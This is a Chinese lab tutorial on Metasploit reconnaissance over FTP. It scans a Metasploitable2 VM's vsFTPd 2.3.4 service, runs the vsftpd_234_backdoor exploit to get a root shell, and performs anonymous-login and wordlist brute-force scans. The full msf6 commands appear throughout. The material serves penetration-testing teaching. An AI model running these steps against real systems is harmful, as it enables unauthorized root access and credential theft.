渗透测试 — Metasploit 内网渗透三 ———Metasploit 渗透测试之信息搜集5 ——基于FTP协议收集信息

实验内网渗透环境

Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

基于FTP协议收集信息         ——Metasploitable2-linux

        FTP(File Transfer Protocol,文件传输协议)是用于在计算机网络上进行文件传输的标准网络协议,客户端-服务器协议允许用户从一个计算机向另一个计算机传输文件。端口号21

本次实验步骤和成果:

1、

        a、利用auxiliary(scanner/ftp/ftp_version)模块扫描FTP服务协议版本信息是2.3.4

        b、通过ftp版本号信息得到ftp的exploit/unix/ftp/vsftpd_234_backdoor攻击模块,

        c、利用这个exploit/unix/ftp/vsftpd_234_backdoor模块攻击linux,可得到root权限的shell

2、利用auxiliary(scanner/ftp/anonymous)进行匿名登录扫描,发现是任何人可成功登录

        ---检测FTP服务器是否允许匿名用户登录,并查看可用的匿名用户权限

        ---结果包括:

                成功登录:任何人都可匿名登录到ftp服务器,并访问其中文件和目录

                拒绝登录:不允许匿名用户登录

                制度权限:只读方式访问文件和目录--可下载文件,但无法上传、删除或修改文件

                读写权限:以读写方式访问文件和目录 --可上传、下载、删除或修改文件

3、利用auxiliary(scanner/ftp/ftp_login)模块进行暴力

        a、开启kali新窗口,手动加入linux用户和密码到字典         ——以便展示效果

        b、ssh_login模块中set创建字典文件对象(设置字典——暴力破解依赖于字典文件)

        c、run,发现ftp登录信息,登录失败,不能登录靶机的ftp服务器          ——进行遍历暴力破解

        auxiliary(scanner/ftp/ftp_login)模块使用了一个字典文件,其中包含了常见的用户名和密码组合,或者用户可以指定自定义的字典文件。模块将遍历字典中的每个用户名和密码组合,并通过FTP协议尝试登录到目标FTP服务器。以获取FTP服务器的非法访问权限。

        暴力破解        ——不停发送数据和收到响应包,如果有有效的密码就可以进行登录

        Shell:常指操作系统提供的命令行界面,得到后可进行一系列命令行操作,如ifconfig等

(1)ftp 获取靶机shell

msf6 > use auxiliary/scanner/ftp/ftp_version         ——加载 ftp 服务版本扫描模块

msf6 auxiliary(scanner/ftp/ftp_version) > show options        ——查看设置参数

msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.234.8

                                                ——输入exploit或run,可设置多个靶机

msf6 auxiliary(scanner/ftp/ftp_version) > run

                                                 ——执行扫描,扫描出版本信息是:vsFTPd 2.3.4

msf6 > search 2.3.4         ——搜索版本号,查看是否有可以利用的模块

msf6 > search vsftpd        ——或者直接搜索vsftpd(very secure FTP daemon--ftp服务器软件)

---发现存在一个 exploit 模块==》这个版本的 ftp 服务存在一个后门

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor         ——加载利用exploit模块

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options         ——查看设置参数

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.234.8

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run         ——得到root权限的shell

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > id        ——查看用户

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > ifconfig         ——查看 IP 地址

(2)ftp 匿名登录扫描

msf6 > use auxiliary/scanner/ftp/anonymous

msf6 auxiliary(scanner/ftp/anonymous) show options

msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.234.8

msf6 auxiliary(scanner/ftp/anonymous) > run

(3)ftp 暴力破解

msf6 > use auxiliary/scanner/ftp/ftp_login

msf6 auxiliary(scanner/ftp/ftp_login) > show options

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.234.8

                ——设置字典文件默认的字典文件是不满足实际需求,后期我们使用更强大的字典文件。

msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

                ——因为字典文件中不包含我们的用户密码信息==》把自己的密码信息手动加入进去以便展示效果

新开一个终端窗口

root@zwzj:~# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

msf6 auxiliary(scanner/ftp/ftp_login) > run         ——回到 MSF 终端

  • 33
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值